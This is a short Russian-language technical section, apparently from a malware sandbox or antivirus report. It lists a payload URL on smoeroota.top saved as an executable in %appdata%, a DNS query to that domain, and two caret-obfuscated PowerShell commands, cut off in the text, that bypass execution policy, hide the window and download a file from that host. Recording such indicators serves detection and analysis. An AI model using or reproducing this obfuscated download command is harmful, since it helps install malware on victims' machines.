Техническая информация
- http://smoeroota.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^Ow^eRSHelL^.E^x^e ^-EXECUT^I^ON^po^lI^C^y ^bYpASs^ -N^oProfIl^E -w^InD^o^Ws^tYl^E h^i^DdEN (^nEw-ObJ^eCt ^syS^T^E^m.^NEt.^wEb^C^L^IENt^).d^O^WnLOAd^fIL^E('http://smoeroo...
- DNS ASK sm###oota.top
- '<SYSTEM32>\cmd.exe' /C "P^Ow^eRSHelL^.E^x^e ^-EXECUT^I^ON^po^lI^C^y ^bYpASs^ -N^oProfIl^E -w^InD^o^Ws^tYl^E h^i^DdEN (^nEw-ObJ^eCt ^syS^T^E^m.^NEt.^wEb^C^L^IENt^).d^O^WnLOAd^fIL^E('http://smoeroo...' (со скрытым окном)